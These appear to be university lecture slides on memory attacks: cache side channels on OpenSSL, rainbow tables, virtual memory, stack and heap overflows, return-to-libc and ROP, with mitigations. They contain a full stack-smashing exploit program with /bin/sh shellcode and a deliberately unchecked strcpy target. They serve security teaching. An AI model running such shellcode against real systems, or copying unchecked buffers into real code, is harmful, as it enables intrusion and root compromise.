
Tutorial: Memory issues

CS2107 Introduction to Information and System Security

(Slide set 9)

Hugh Anderson

National University of Singapore, School of Computing

October, 2016

Hugh Anderson CS2107 Introduction to Information and System Security (Slide set 9)


Memory... Not yours - the computers!


Outline

1 Tutorial
    OpenSSL side-channel attack (Feb 2014)
    Reversing a hash

2 Memory issues
    Memory usage, memory architecture in an OS
    Specific direct attacks
    OpenSSL Heartbeat/memory attack (April 2014)


Resources

For this lecture, from SEv2.pdf, section 4.4.

http://phrack.org/issues/49/14.html

http://www.h-online.com/security/features/A-Heap-of-Risk-747161.html


OpenSSL side channel attack

OpenSSL: An important bit of security software. Why? Because it is used in about 60% of all web based SSL (https) servers. As a result of this we are very interested in bugs in OpenSSL. It may be the software most closely examined for security errors - all 700,000 lines of code!

What is the (one second) attack? From the paper at http://eprint.iacr.org/2014/140.pdf:

“Our attack recovers the scalar k and thus the secret key of the signer and would therefore allow unlimited forgeries.”

The attack is a side channel attack. An attacker can determine if code has been cached or not. If it has been used, then it will be cached.


Timing attack on a constant time function!

Simple double-and-add, and the Montgomery ladder:

    Q = O;
    foreach bit in key {
        Q = 2Q;
        if (bit==0) {
            Q = Q + P;
        }
    }
    return Q;

    R0 = O;
    R1 = P;
    foreach bit in key {
        if (bit==0) {
            R1 = R0 + R1;
            R0 = 2R0;
        } else {
            R0 = R0 + R1;
            R1 = 2R1;
        }
    }
    return R0;

Both functions return the same result, but the second one (on the right of the slide) runs in a constant time... OpenSSL is built with security in mind, so (of course) it uses the Montgomery ladder - the code to the right, that runs in constant time.

OpenSSL running a program

As the openssl program runs, it caches the code...

[Figure: the CPU fetches OpenSSL's code from program memory (about 70 nS) into the instruction cache (about 1 nS) in cache "lines"; the code in memory for the branch `if (word & mask)`, with its calls to gf2m_Madd(group, ...) and gf2m_Mdouble(group, ...), is cached when it is first used (FOR SPEED!). The attacker process shares the same cache.]

If bit is a “1” THIS is cached...

[Figure: the same layout, with the cache lines A, B, C, D holding the gf2m_Madd / gf2m_Mdouble code reached on the taken branch.]

(and the attacker can determine this by seeing how fast the four cache lines A, B, C, D are loaded)

If bit is a “0” THIS is cached...

[Figure: the same layout, with the cache lines A, B, C, D holding the code reached on the other branch.]

(and the attacker can determine this by seeing how fast the four cache lines A, B, C, D are loaded)


OpenSSL timing

Original openssl-1.0.1f/crypto/ec/ec2_mult.c:

    ...
    if (word & mask) {
        gf2m_Madd(..., x1, ...
    } else {
        gf2m_Madd(..., x2, ...
    }

Each bit of a word is being tested, and depending on the bit we take two different paths. The paths operate on different (code) memory locations. If a particular path is taken, then a particular memory location would be cached, and an attacker can (afterwards) discover that, because that memory location would load faster. In this way an attacker can determine which path was taken and hence the value of each bit.

Fixed openssl-1.0.1g/crypto/ec/ec2_mult.c:

    ...
    BN_consttime_swap(word & mask, x1, x2, ...
    gf2m_Madd(...
    BN_consttime_swap(word & mask, x1, x2, ...

We use a constant time swap, to put the variables in the same memory locations.
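To see what the constant-time swap buys, here is an added example (not OpenSSL's code) in which plain 32-bit integers stand in for curve points, an assumption made so the example is self-contained: the branchy ladder from the slide and the swap-based ladder of the fix give the same result, but only the first executes different instructions depending on each key bit.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Branch-free conditional swap in the style of BN_consttime_swap(): when
   cond is 1 the two arrays are exchanged, when 0 they are left alone, but
   the same loads, stores and XORs happen at the same addresses either way. */
void consttime_swap(uint32_t cond, uint32_t *a, uint32_t *b, size_t n) {
    uint32_t mask = 0u - (cond & 1u);          /* 0x00000000 or 0xffffffff */
    for (size_t i = 0; i < n; i++) {
        uint32_t t = (a[i] ^ b[i]) & mask;
        a[i] ^= t;
        b[i] ^= t;
    }
}

/* Branchy ladder from the slide: the key bit selects which statements run,
   so which code is fetched (and cached) depends on the secret. Integers mod
   2^32 replace curve points: "2R" is 2*r and "R0 + R1" is r0 + r1. */
uint32_t ladder_branchy(uint32_t k, uint32_t p) {
    uint32_t r0 = 0, r1 = p;
    for (int i = 31; i >= 0; i--) {
        uint32_t bit = (k >> i) & 1u;
        if (bit == 0) { r1 = r0 + r1; r0 = 2 * r0; }
        else          { r0 = r0 + r1; r1 = 2 * r1; }
    }
    return r0;                                 /* k * p mod 2^32 */
}

/* Swap-based ladder as in the fixed ec2_mult.c: swap, run one fixed sequence
   of operations, swap back. No instruction address depends on the bit. */
uint32_t ladder_consttime(uint32_t k, uint32_t p) {
    uint32_t r[2] = { 0, p };
    for (int i = 31; i >= 0; i--) {
        uint32_t bit = (k >> i) & 1u;
        consttime_swap(bit, &r[0], &r[1], 1);
        r[1] = r[0] + r[1];
        r[0] = 2 * r[0];
        consttime_swap(bit, &r[0], &r[1], 1);
    }
    return r[0];
}

/* cond 0 leaves both arrays alone, cond 1 exchanges them element-wise. */
int swap_selftest(void) {
    uint32_t a[3] = { 1, 2, 3 }, b[3] = { 4, 5, 6 };
    consttime_swap(0, a, b, 3);
    if (a[0] != 1 || a[2] != 3 || b[2] != 6) return 0;
    consttime_swap(1, a, b, 3);
    if (a[0] != 4 || a[2] != 6 || b[0] != 1 || b[2] != 3) return 0;
    return 1;
}

int main(void) {
    printf("branchy   : %u\n", ladder_branchy(12345u, 6789u));
    printf("consttime : %u\n", ladder_consttime(12345u, 6789u));
    printf("swap test : %s\n", swap_selftest() ? "ok" : "FAILED");
    return 0;
}
```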


Reversing a hash...

Precomputed tables for helping find collisions?

A precomputed table for 10-character (A-Z, a-z, 0-9) passwords might have (say) 62^10 = 839,299,365,868,340,224 entries, each containing a 16-byte value. That's a big disk (about 13,000,000 TB).

Indexing by hash is even worse. We do not really have names for disks that big.

    Password   (MD5) Hash
    aaaaaaaa   3dbe00a1676...
    aaaaaaab   2125ea8b81b...
    aaaaaaac   ea67f32d4e6...
    aaaaaaad   746a8ab05d6...
    aaaaaaae   c554d695eb0...
    aaaaaaaf   09eb61fd25b...
    aaaaaaag   68b5af18408...
    ...        ...


Reversing a hash: “rainbow” tables

Precompute long chains, but only keep two values

Precompute chains of values starting from a password guess, and using alternate hash functions h(p), and a reversing function r(h), which generates a predictable plausible guess from the hash.

Only store the first and last entries from the chain. It is space efficient, and you can re-compute the intermediate values (a space-time tradeoff).

[Figure: two chains (Chain #1, Chain #2). Compute: from a starting guess, alternately apply h(p) and r(h); the values shown are the passwords aaaaaaaaa, srxx21try, asbdhdf13, mlacziryt, xyuivlzrs and cracyl13d, and the hashes fedc1234.., 4fad6544.., 0a224fad.., 2399afb0.., f0e377b6.. and d001afde... Store: only the first password and the last hash of each chain.]

Reversing a hash: “rainbow” tables

Precompute long chains, but only keep two values

[Figure: reversing a hash with the stored chain ends. 1. Compute chain from hash (alternately r(h), h(p)); 2. Compare candidates with chain ends; 3. Recompute chain to reverse hash; 4. Password: asbdhdf13. Values shown: aaaaaaaaa, srxx21try, cracyl13d, 4fad6544.., fedc1234.., f0e377b6.., d001afde...]
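The chain construction and the four lookup steps above, as an added example (not from the slides): h(p) is a toy 32-bit FNV-1a hash standing in for MD5, r(h) maps a hash to a three-letter guess, and the table keeps only (first password, last hash) per chain, all constructed here so it runs offline. The single fixed r(h) follows the slide; production rainbow tables vary r per column to limit chain merges.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PW_LEN    3          /* toy password space: three lowercase letters */
#define CHAIN_LEN 100        /* hashes computed per chain                    */
#define ALPHA "abcdefghijklmnopqrstuvwxyz"

typedef struct {
    char     start[PW_LEN + 1];   /* first password of the chain (stored) */
    uint32_t end;                 /* last hash of the chain (stored)      */
} chain_t;

/* h(p): 32-bit FNV-1a, a toy stand-in for MD5 (constructed for this example). */
uint32_t h(const char *p) {
    uint32_t hv = 2166136261u;
    for (; *p; p++) { hv ^= (unsigned char)*p; hv *= 16777619u; }
    return hv;
}

/* r(h): turn a hash back into a plausible password guess. */
void r(uint32_t hv, char *out) {
    for (int i = 0; i < PW_LEN; i++) { out[i] = ALPHA[hv % 26]; hv /= 26; }
    out[PW_LEN] = '\0';
}

/* Walk one chain from its start: p0 -h-> hv0 -r-> p1 -h-> hv1 ... and return
   the final hash. If out is non-NULL, the idx-th password is copied into it. */
uint32_t walk_chain(const char *start, int idx, char *out) {
    char p[PW_LEN + 1];
    uint32_t hv = 0;
    strcpy(p, start);
    for (int i = 0; i < CHAIN_LEN; i++) {
        if (out != NULL && i == idx) strcpy(out, p);
        hv = h(p);
        r(hv, p);
    }
    return hv;
}

/* Build the table: only (start, end) is kept for each chain. */
void rainbow_build(const char *const *starts, int n, chain_t *table) {
    for (int c = 0; c < n; c++) {
        strcpy(table[c].start, starts[c]);
        table[c].end = walk_chain(starts[c], -1, NULL);
    }
}

/* Steps 1-3 of the slide: extend target by k (r, h) steps and compare with
   the chain ends; on a hit, recompute that chain from its stored start until
   the hash equal to target appears; the password that produced it is the
   answer. Returns 1 and fills out on success, 0 if no chain covers target. */
int rainbow_lookup(const chain_t *table, int n, uint32_t target, char *out) {
    uint32_t hv = target;
    char p[PW_LEN + 1];
    for (int k = 0; k < CHAIN_LEN; k++) {
        for (int c = 0; c < n; c++) {
            if (table[c].end != hv) continue;
            strcpy(p, table[c].start);               /* candidate: replay it */
            for (int j = 0; j < CHAIN_LEN; j++) {
                uint32_t hj = h(p);
                if (hj == target) { strcpy(out, p); return 1; }
                r(hj, p);
            }
            /* false alarm: another chain merged into this end; keep going */
        }
        r(hv, p);                                     /* one more (r, h) step */
        hv = h(p);
    }
    return 0;
}

/* Three chains, then reverse the hash of a password known to sit in chain 2. */
int rainbow_selftest(void) {
    static const char *const starts[3] = { "aaa", "bbb", "ccc" };
    chain_t table[3];
    char pw[PW_LEN + 1], found[PW_LEN + 1];
    rainbow_build(starts, 3, table);
    walk_chain("bbb", 10, pw);                  /* 11th password of chain 2 */
    if (!rainbow_lookup(table, 3, h(pw), found)) return 0;
    if (h(found) != h(pw)) return 0;            /* found hashes to the target */
    printf("%s -> %08x -> %s\n", pw, h(pw), found);
    return 1;
}
```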


In practice: ophcrack

The old LM Windows hash


Outline of memory usage

We will...
    Discuss the use of computer memory in an OS
    Discuss storage techniques for data
    Outline the properties of the stack, main memory and the heap

What is memory used for?
    To store programs (maybe in code or text segments).
    To store data - variables, constants, strings... (in a data segment)
    To store local transitory data such as return addresses when you call a function or method, and local method variables (in the stack segment).

What do you mean... Return address?

... and what is a stack when it is at home?


How programs use memory for return addresses

Return addresses need to be nested, so we use a stack:

    10 readInput() {
       ...
       ...
    24 }
    .. ...
    .. ...
    31 processItem() {
    32 ...
    .. ...
    37 }
    ......
    43 processData() {
    44 ...
    45     processItem();      // Save away 46 and call processItem()
    46 ...                     // Return to the most recent saved away address
    .. ...
    54 }
    ......
    65 main() {
    66 ...
    67     readInput();        // Save away 68 and call readInput()
    68 ...                     // Return to the most recent saved away address
    69 ...
    70 ...
    71     processData();      // Save away 72 and call processData()
    72 ...                     // Return to the most recent saved away address
    73 }

[Figure: the stack beside the listing. At line 67 the stack holds 68; after readInput() returns at line 24 it is empty again; at line 71 it holds 72; at line 45, inside processData(), it holds 72 and 46; when processItem() returns at line 37 it holds 72 again; when processData() returns at line 54 it is empty.]

A little warning... Later, we will use stacks that are upside down, because that is how computers use stacks - they grow towards lower/smaller addresses.


How programs use memory for data

Storing a string will come back to haunt us... Operating systems, and many applications, are written in C.

In C, a string like Hello is stored in six successive bytes: the five characters, and a NULL terminating character. This allows compact representation, and fast access to a string. In Java, for contrast, a string is stored as an object. For a five character string, the storage takes up 48 bytes: an object containing the actual characters; an integer offset into the array at which the string starts; the length of the string; and another int. This results in non-compact representation, and slow access.

When memory is needed for a program, the OS allocates memory:

The calls to access memory are malloc() and free(). Java maintains its own heap, separate from the system heap. When lots of allocations and deallocations are being made, the heap may become fragmented. The OS will run a garbage collector to fix up the heap from time to time.


Memory hierarchy

For small embedded systems: one level of memory. Program variables are next to each other in memory - no protection between processes.

Primary memory (RAM/ROM) may store and retrieve values in 20 nS.

For Windows/GNU+Linux: protection, and a hierarchy... Process variables in memory are not visible to other processes.

There is a hierarchy of memory:
    Values in a register or cache are accessed in less than 1 nS,
    Primary/physical memory (ROM/RAM) may take 10 nS to access.
    Secondary memory (i.e. a disk) - milliseconds access time.


Windows/GNU+Linux: virtual memory addressing

Overview: Modern operating systems and hardware give each process an individual address space - normally starting at address 0.

These addresses cannot directly map onto the same address of real memory, because then each process would just be seeing the same memory.

Instead a translation unit maps this virtual address to a real physical address.

It is common for a virtual address space to be the entire hardware address space of the processor - that is the address range the processor could access using all its address lines.


Process use of memory

Virtual memory, physical memory, and translations...

[Figure: prog 1, prog 2 and the OS kernel each have their own virtual memory, mapped by translations onto physical memory.]

The processes, and the OS kernel, each have their own view of memory, somehow mapped/translated to the real (physical) memory.


Virtual memory

Simple memory versus VM memory

[Figure: simple memory: the CPU's address and data bus go straight to ROM, RAM and I/O (address 0002 selects location 2). VM memory: the CPU's address goes through an MMU table that translates the virtual address to a physical address; the lower-order address lines pass through unchanged; high-speed RAM is backed by disk.]

Virtual memory also allows the execution of programs that may not reside completely in memory, by using disk to act as memory.

VM systems may provide a virtual address space much larger than the physical address space.


GNU+Linux memory allocation

3G before OS kernel v2.6, 4G afterwards

[Figure: the 32-bit address space 0x00000000 to 0xffffffff split into user and kernel parts, with boundaries marked at 0x7fffffff/0x80000000 and 0xbfffffff/0xc0000000, labelled 3G (before v2.6) and 4G (after v2.6).]

OS Kernel contains drivers, system stacks, page tables...

User contains executable code, libraries, stacks...


... and swap ...

Secondary storage (disk) stores memory contents. The part of the disk used in this way is called the ’swap’ - it may be either a file used for the purpose, or a partition of disk.

It is common for VM systems to have a swap area two to ten times as large as the physical memory.


VM=paging+segments (+disk)...

The Intel CPU chip can use both segmentation and paging:

[Figure: logical address cs:offset. The 16-bit CS selector (index and mode bits) is looked up in the GDT or LDT, giving a base and a limit; the 32-bit offset is checked against the limit and added to the base, giving the linear address. The linear address dddddddddd tttttttttt oooooooooooo (10-bit page directory index, 10-bit page table index, 12-bit offset) is paged via the page directory and page table to a frame, giving the physical address. Example values shown: 0x00201217 and 0xc0132217.]
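As an added example (not from the slides or any real kernel) of the paging half of the figure, here is a two-level page table walk over the 10/10/12 split. The mapping of 0x00201217 onto 0xc0132217 is constructed to match the two values in the figure, and a directory entry holds a table number rather than a frame address, an assumption that keeps this a pure simulation.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

#define ENTRIES     1024     /* 10-bit directory and table indices */
#define NTABLES     4        /* page tables available in this toy  */
#define PTE_PRESENT 0x1u     /* bit 0 of an x86 entry: present     */

/* Constructed structures: one page directory and a small pool of page
   tables. A directory entry stores (table number << 12) | PTE_PRESENT. */
static uint32_t page_dir[ENTRIES];
static uint32_t page_tables[NTABLES][ENTRIES];
static int      tables_used;

/* The three fields of a linear address: dddddddddd tttttttttt oooooooooooo */
uint32_t dir_index(uint32_t lin)   { return lin >> 22; }
uint32_t table_index(uint32_t lin) { return (lin >> 12) & 0x3ffu; }
uint32_t page_offset(uint32_t lin) { return lin & 0xfffu; }

/* Map the 4K page containing lin onto the 4K frame containing phys,
   allocating a page table for the directory slot if it has none yet. */
bool map_page(uint32_t lin, uint32_t phys) {
    uint32_t d = dir_index(lin);
    if (!(page_dir[d] & PTE_PRESENT)) {
        if (tables_used >= NTABLES) return false;    /* out of page tables */
        page_dir[d] = ((uint32_t)tables_used++ << 12) | PTE_PRESENT;
    }
    uint32_t *table = page_tables[page_dir[d] >> 12];
    table[table_index(lin)] = (phys & ~0xfffu) | PTE_PRESENT;
    return true;
}

/* Translate lin to a physical address. Returns false where real hardware
   would raise a page fault: directory entry or table entry not present. */
bool translate(uint32_t lin, uint32_t *phys) {
    uint32_t pde = page_dir[dir_index(lin)];
    if (!(pde & PTE_PRESENT)) return false;
    uint32_t pte = page_tables[pde >> 12][table_index(lin)];
    if (!(pte & PTE_PRESENT)) return false;
    *phys = (pte & ~0xfffu) | page_offset(lin);     /* frame + offset */
    return true;
}

/* Reproduce the figure's pair of values, then two faulting addresses. */
int pagewalk_selftest(void) {
    uint32_t phys = 0;
    if (!map_page(0x00201217u, 0xc0132000u)) return 0;
    if (!translate(0x00201217u, &phys) || phys != 0xc0132217u) return 0;
    if (translate(0x00202217u, &phys)) return 0;   /* same table, entry absent */
    if (translate(0x40000217u, &phys)) return 0;   /* directory entry absent   */
    printf("0x00201217 -> dir %u, table %#x, offset %#x -> 0x%08x\n",
           dir_index(0x00201217u), table_index(0x00201217u),
           page_offset(0x00201217u), 0xc0132217u);
    return 1;
}
```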


Process view: GNU+Linux ELF format segments

Program, shared libraries, stack...

[Figure: Linux/ELF user memory from 0x00000000 up to 0xbfffffff: a guard at the bottom, the program (code, data, bss) from 0x00010000, malloc'ed memory above it, the C libraries (code, data, bss) around 0x40000000, and the stack at the top with a guard below it; 0x84000000 is also marked.]

Malloc’ed memory “above” the program...

Stack grows downwards...


Summary...

Use and architecture of memory:
    Memory is used to store programs, data, and the stack.
    Simple memory systems are found in embedded systems (i.e. smart cards), where there is no protection of memory.
    Complex memory systems manage heaps of memory for use by programs. Java maintains its own heap.
    Applications use malloc() and free() to access memory from the heap.

Larger operating systems use VM (Virtual memory):
    VM may use segments (i.e. a code segment, a data segment or a stack segment), and
    VM may use paging (i.e. memory managed in small fixed size chunks).
    Segments are protected from each other.
    GNU+Linux and Windows both use paging and segments.
    Remember also the swap area on disk, and page faults.


Attacks based on the computer’s memory

In all this complexity... There are many memory attacks:
    Direct attacks on protected and unprotected memory systems.
    Direct attacks on the processor, its memory management hardware, and the page fault system.
    Attacks on the disk/swap space.
    Attacks on the system heap, the Java heap, the garbage collectors.
    Attacks on the page tables, the segment tables.

We will start with the two most well known:
    Memory attack 1: Stack/Buffer overflows; how they happen, and approaches to reduce the likelihood of an attack.
    Memory attack 2: Heap/Buffer overflows; how they happen, and approaches to reduce the likelihood of an attack.


Memory attack 1: stack/buffer overflow

Most well known compromise of computer systems. One of a general class of problems caused by software that does not check its parameters for extreme values.

The attack mechanism is:
    Find a program that accepts input from us (or our attacking program), and uses a buffer (a) without checking bounds.
    Deliver EGG to it to overflow buffer.
    Overwrite stack return address with address of OUR code.
    Program then runs OUR code.

Need to examine the way programs use memory.

Presentation based on http://phrack.org/issues/49/14.html

(a) A buffer is just an array you are using for temporary storage.


Memory attack 1: simple program

A pretty simple program...

    #include <stdio.h>
    #include <string.h>

    void main (int argc, char *argv[]) {
        char buffer[512];
        printf ("Argument is %s\n", argv[1]);
        strcpy (buffer, argv[1]);
    }

CODE LISTING vulnerable.c

When we run it:

    [hugh@pnp176-44 programs]$ ./vulnerable test
    Argument is test
    [hugh@pnp176-44 programs]$

but...


Memory attack 1: simple program

[Figure: normal operation: in the computer's memory the stack (which grows down) holds the arguments, the return address, the 512-byte buffer and the variables. Overwriting the end of the array with an "EGG": the input runs past the end of the buffer and over the return address.]


Memory attack 1: Code creates EGG...

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define DEFAULT_OFFSET 0
    #define DEFAULT_BUFFER_SIZE 512
    #define NOP 0x90

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    unsigned long get_sp (void) {
        __asm__ ("movl %esp,%eax");
    }

    void main (int argc, char *argv[]) {
        char *buff, *ptr;
        long *addr_ptr, addr;
        int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
        int i;

        if (argc > 1) bsize = atoi (argv[1]);
        if (argc > 2) offset = atoi (argv[2]);
        if (!(buff = malloc (bsize))) {
            printf ("Can't allocate memory.\n");
            exit (0);
        }
        addr = get_sp () - offset;
        printf ("Using address: 0x%x\n", addr);
        ptr = buff;
        addr_ptr = (long *) ptr;
        for (i = 0; i < bsize; i += 4)
            *(addr_ptr++) = addr;
        for (i = 0; i < bsize / 2; i++)
            buff[i] = NOP;
        ptr = buff + ((bsize / 2) - (strlen (shellcode) / 2));
        for (i = 0; i < strlen (shellcode); i++)
            *(ptr++) = shellcode[i];
        buff[bsize - 1] = '\0';
        memcpy (buff, "EGG=", 4);
        putenv (buff);
        system ("/bin/bash");
    }

CODE LISTING exploit3.c


Smashing the stack - the payload!

Contents of the payload

[Figure: the payload as laid out in the computer's memory on the stack: multiple no-op instructions, then the machine code for the exploit, then multiple copies of the malicious return address.]


Payload code for an exploit

A C program which calls a shell...

    #include <stdio.h>
    #include <unistd.h>

    void main() {
        char *nm[2];
        nm[0] = "/bin/sh";
        nm[1] = NULL;
        execve(nm[0], nm, NULL);
    }

    movl  string,string_addr
    movb  $0x0,null_byte
    movl  $0x0,null_addr
    movl  $0xb,%eax
    movl  string,%ebx
    leal  string,%ecx
    leal  null_string,%edx
    int   $0x80            // OS call
    “/bin/sh” string goes here.

At the left we see some C source code for running the program /bin/sh. On the right we see assembler code with extra OS nonsense removed.

Note that the binary code program has “zeroes” in it, and these will have to be removed if strcpy is to copy the program onto the stack. We can use translations like:

    movb $0x0,null_byte    becomes    xorl %eax,%eax
                                      movb %al,null_byte


Using the buffer overflow attack

3 examples of situations in which we can use it:
    1 A server (say a web server) that expects a query, and returns a response. The demo buffer overflow attack done in class is one of these.
    2 A CGI/ASP or perl script inside a web server
    3 A SUID root program on a UNIX system

Find a program that has a buffer, ... and that does not check its bounds. Then deliver an EGG to it to overflow the buffer. Overwrite stack return address with address of OUR code. The program then runs OUR code.

Example attack: Many attacks on Microsoft systems are based on various buffer overflow problems. CA-2003-20 W32/Blaster worm: The W32/Blaster worm exploits a vulnerability in Microsoft’s DCOM RPC interface as described in VU#568148 and CA-2003-16. Upon successful execution....


Memory attack 1: example

Consider the following scenario... The virtual machine running on the Mac is running GNU+Linux, and a (cut down) version of an old version of the Apache web server.

[Figure: VM honeypot on Hugh’s Mac: the (virtual) web server runs inside the VM, and the attack is launched from Hugh’s Mac.]


Memory attack 1(a): web server code...

And in the web server we have this code:

    void process(int newsockfd) {
        char line[512];
        ...
        ...
        // NEXT BIT DOESN'T CHECK ARRAY SIZE! i.e. n<511
        while (n>0 && c!='\n') {
            n = read (newsockfd, &c, 1);
            ... add it to line[idx++] ...
        }
        ...
        return;
    }

The general operation of this web server is hackable... It matches our attack mechanism: a web server receives a file spec (index.html), and does not properly check a buffer that it puts the spec into.

We replace the file spec with EGG. Note that we will have to use a specialized program to deliver the EGG (i.e. not firefox).


How to fix buffer overflows?

Find them! ... But also... Use safety technologies:
    DEP: Not allowing execution of code in the stack segment (as in Mac OS X/OpenBSD).
    ASLR: Address space layout randomization - randomly moving the starting memory locations for processes. Implemented in GNU+Linux since 2005, and in Windows since 2007.
    Putting a value just below the return address (a canary), and checking it before doing a return from subroutine. It is hard to overwrite the return address without overwriting the canary. This is standard now in Visual Studio and gcc compilers.

Use good programming practice:
    Always check ranges of parameters, and be careful with arrays. man strcpy
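As an added example of the last point (not code from the slides, from vulnerable.c or from the web server), here is a bounded copy that replaces the strcpy() in vulnerable.c, and a bounded version of the read loop in process(); the socket is replaced by a constructed in-memory byte stream so it runs offline.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Bounded replacement for the strcpy() in vulnerable.c: copies src into
   dst[cap] only if it fits, NUL terminator included. Returns 0 on success,
   -1 if it would overflow, in which case dst is left as an empty string. */
int copy_arg_bounded(char *dst, size_t cap, const char *src) {
    size_t len = strlen(src);
    if (cap == 0) return -1;
    if (len >= cap) {                /* no room for len bytes plus the '\0' */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Stand-in for the socket in process(): a constructed byte stream that
   read_one() hands out one byte at a time, like read(newsockfd, &c, 1). */
typedef struct { const char *data; size_t len; size_t pos; } fake_sock;

int read_one(fake_sock *s, char *c) {
    if (s->pos >= s->len) return 0;             /* EOF, as read() returns 0 */
    *c = s->data[s->pos++];
    return 1;
}

/* Bounded version of the web server's loop: stops at '\n' or EOF, and
   refuses (returns -1) as soon as the line would not fit into line[cap]
   together with its terminator. This is the check the original omits.
   On success returns the number of bytes stored. */
int read_line_bounded(fake_sock *s, char *line, size_t cap) {
    size_t idx = 0;
    char c;
    if (cap == 0) return -1;
    for (;;) {
        if (read_one(s, &c) <= 0 || c == '\n') break;
        if (idx + 1 >= cap) {                   /* line[cap-1] is for '\0' */
            line[idx] = '\0';
            return -1;
        }
        line[idx++] = c;
    }
    line[idx] = '\0';
    return (int)idx;
}

/* Exercise both with a normal request line and an oversized one. */
int bounds_selftest(void) {
    char line[16], arg[8];
    const char *ok_req  = "GET /index.html\n";                   /* 15 + '\n' */
    const char *big_req = "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n";
    fake_sock ok  = { ok_req,  strlen(ok_req),  0 };
    fake_sock big = { big_req, strlen(big_req), 0 };
    if (read_line_bounded(&ok, line, sizeof line) != 15) return 0;
    if (strcmp(line, "GET /index.html") != 0) return 0;
    if (read_line_bounded(&big, line, sizeof line) != -1) return 0;
    if (strlen(line) >= sizeof line) return 0;          /* still terminated */
    if (copy_arg_bounded(arg, sizeof arg, "test") != 0) return 0;
    if (strcmp(arg, "test") != 0) return 0;
    if (copy_arg_bounded(arg, sizeof arg, "much-too-long") != -1) return 0;
    if (arg[0] != '\0') return 0;                        /* refused, emptied */
    return 1;
}
```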


Memory attack 1(b): return to libc!

Even with DEP: run code already in libc...

[Figure: the stack, high memory at the top: the buffer, then the return address. The return address now has the address of the libc system call system(). You still need to provide an argument to the system call... so you get system("/bin/sh").]


Memory attack 1(c): return oriented programming

Even with DEP: find code snippets, and overwrite stack...

[Figure: the stack, high memory at the top: the buffer, then where the return address was, a list of addresses of code snippets somewhere in memory (pop eax; ret / pop ebx; ret / add eax,ebx; ret) interleaved with the values 42 and 212. Resultant execution: eax = 42; ebx = 212; eax += ebx; ....]


Memory attack 2: heap overflow

The younger sibling of the buffer overflow. The heap is managed by the OS as a doubly linked data structure, containing a header, and the memory to be allocated.

The attacker starts by constructing/coding something that results in the OS allocating and deallocating memory from the heap. Then:
    After the malloc(), the program writes to the memory, and then returns it using free(). By careful choice of what we write to the memory, we can overwrite the NEXT header in the heap.
    The OS then merges this freed-up memory, manipulating the headers in order to do so. It rewrites values in the previous headers that are dependent on the values in the next headers.
    If the next header is modified to point to some place where a return address is being kept, then we can run crafted code.

Background reading: http://www.h-online.com/security/features/A-Heap-of-Risk-747161.html


Memory attack 2: heap overflow

Consider the following part of a heap...

[Figure: three chunks on the heap (a chunk of in-use memory, a chunk of free memory, another chunk of in-use memory) joined by forward links and backward links.]


Memory attack 2: heap overflow

The normal free() and merge...

[Figure, three steps: 1. Return this one: free(); 2. Then merge the links (garbage collection); 3. Merged (bigger) chunk of free memory on the heap, between the chunks of in-use memory. Notation: m[p[1]] is the heap location that p[1] points to; m[p[1]][0] is the backward pointer and m[p[1]][1] is the forward pointer. Note that merging involves setting m[p[1]][0] to have the value in p[0].]

The OS heap management software automatically rewrites the values of the forward and backward links, using the values in the next links.

Page 48

Memory attack 2: heap overflow

Consider the scenario where the attacker changes pointers...

[Figure, three steps numbered 1, 2, 3, on the same heap as before. The overflow has overwritten the links in the header of the chunk of free memory next to the chunk being returned: one link now holds the address of the return vector and the other the address of bad code. (1) Return this one: free(). (2) Then merge the links (garbage collection): links all messed up now... (3) The "garbage collector" writes the address of the bad code into the return vector. Later the return instruction is done (same as in the buffer overflow), and the system starts executing bad code.]

The attacker uses the allocator's merge step to write the address of malicious code into a return-address location, as for the buffer overflow.
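The mechanism described on the previous slides (the overflow into the next chunk's header, the two link rewrites done by the merge, and the return address ending up pointing at bad code) carried through in a toy model. This is an added example written for this page, not code from the slides or from any real allocator: chunk_t, unlink_chunk, the heap layout, the "stack frame" and the "shellcode" buffer are all invented stand-ins, sized so the overflow and the bad writes stay inside the program's own storage instead of corrupting the real heap. The link rewrite itself is the classic unlink step (FD->bk = BK; BK->fd = FD) that old allocators ran without checking that FD and BK are really free-list chunks.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct chunk {
    size_t size;          /* size of this chunk */
    struct chunk *fd;     /* forward link: next free chunk      (the slide's m[p][1]) */
    struct chunk *bk;     /* backward link: previous free chunk (the slide's m[p][0]) */
} chunk_t;

/* Removing a chunk from the free list when it is coalesced with a neighbour
 * (the slide's "merge the links"). The neighbours are found by following this
 * chunk's own links and are then written to, with no check that fd and bk
 * really point at free-list chunks. That gives two attacker-steerable writes. */
static void unlink_chunk(chunk_t *p)
{
    chunk_t *FD = p->fd;
    chunk_t *BK = p->bk;
    FD->bk = BK;          /* write 1: *(FD + offsetof(bk)) = BK */
    BK->fd = FD;          /* write 2: *(BK + offsetof(fd)) = FD */
}

/* Benign case: free list a <-> b <-> c, chunk b leaves the list. Returns 1 if a <-> c. */
int normal_unlink_demo(void)
{
    chunk_t a = {32, NULL, NULL}, b = {32, NULL, NULL}, c = {32, NULL, NULL};
    a.fd = &b; b.bk = &a;
    b.fd = &c; c.bk = &b;
    unlink_chunk(&b);
    return a.fd == &c && c.bk == &a;
}

/* Constructed victim memory. The in-use chunk's 16 data bytes are directly
 * followed by the header of a free chunk, as on the slides' heap diagram. */
struct heap_layout {
    chunk_t hdr;              /* header of the in-use chunk the program writes into */
    unsigned char data[16];   /* its user data */
    chunk_t next_hdr;         /* header of the free chunk that follows it */
};
static union {
    unsigned char raw[sizeof(struct heap_layout)];
    struct heap_layout l;
} heap;
static struct { uintptr_t locals[4]; chunk_t *saved_return; } frame;   /* a stack frame */
static union { chunk_t as_chunk; unsigned char bytes[64]; } shellcode;   /* the "bad code" */

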